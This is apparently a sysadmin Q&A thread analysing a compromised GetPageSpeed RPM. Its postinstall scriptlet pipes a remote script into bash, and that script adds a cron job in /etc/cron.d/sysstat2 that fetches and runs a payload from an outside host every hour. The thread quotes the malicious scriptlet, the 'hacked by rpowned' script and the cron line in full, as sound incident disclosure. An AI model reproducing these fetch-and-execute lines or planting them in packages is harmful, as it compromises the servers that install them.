15

Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:

# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package

How did the RPM create the file and how do I see what else it did?

Pascal
  • 493
  • 2
  • 11
  • 4
    So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves? – Aaron Copley Jun 24 '19 at 20:40
  • 1
    The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form. – Pascal Jun 24 '19 at 20:47
  • And it's signed by them, too? – Aaron Copley Jun 24 '19 at 20:47
  • I don't know how to find that out. – Pascal Jun 24 '19 at 20:48
  • Did you have `gpgcheck=1` in your `/etc/yum.repos.d/getpagespeed-extras.repo`? Looks like this RPM might have replaced the file anyway, so you can't necessarily trust its current state. For some reason [it's considered an optional step](https://www.getpagespeed.com/redhat) in their configuration, but it's generally a good idea at preventing stuff like this from happening. – Aaron Copley Jun 24 '19 at 21:00
  • 1
    `https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm` is the original file, it still has an old date in their repo, and `gpgcheck=1` is set in it. – Pascal Jun 24 '19 at 21:05
  • 1
    Suggest you also contact the web admin at sayitwithagift.com although YMMV as to what kind of a response you get. I ended up going through a website’s hosting provider to get in touch about a misconfugured mail server once as the website itself never responded. – Darren Jun 25 '19 at 10:57
  • @Darren I contacted sayitwithagift.com as well. – Pascal Jun 25 '19 at 16:22

3 Answers3

17
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1

https://www.getpagespeed.com/SCM/release-post-install.php contains:

#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2
Pascal
  • 493
  • 2
  • 11
16

You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.

rpm cannot completely track what happened because it is running an arbitrary script.

gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:

$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub  2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub  2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK

Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.

It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.

John Mahowald
  • 30,009
  • 1
  • 17
  • 32
  • The payload is a cron job that downloads and runs 'https://www.sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload. – Pascal Jun 24 '19 at 23:00
  • Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does. – Pascal Jun 24 '19 at 23:31
  • 1
    Unclear whether the addition of from the Internet code exec is a legit idea, or added by the malware crew. The latter is even worse, because that implies the signing and upload processes were compromised. – John Mahowald Jun 25 '19 at 11:14
1

I have 5 CLoudLinux/cPanel servers the used to have Nginx on them via Engintron, but they now run LiteSpeed webserver instead. I think Engintron may have left the pagespped repos behind when it was uninstalled. cPanel runs an update check every night, and at about midnight all of my servers sent me an E-mail reporting:

/bin/sh: -c: line 0: syntax error near unexpected token `('
/bin/sh: -c: line 0: `/bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1'

A search for the payload site led me here where I see that on the same day you had the same issue. So to add my info to your own. The same /etc/cron.d/sysstat2 file existed on all of my servers.

I deleted the file, removed the repos, and used the contact form at GetPageSpeed to report the issue. The owner of the Repo may be AWOL as there was a blog post saying that he was shutting the repo down due to health issues. So maybe the attacker either took advantage of the fact that the repo is not getting attention, or found an open door to exploit.

John C. Reid
  • 11
  • 1
  • 1
    The message about shutting down the repo was posted after he received my email about being compromised. I asked him to open the repo again and post updated packages to remove `/etc/cron.d/sysstat2`. He has done so. – Pascal Jun 25 '19 at 20:49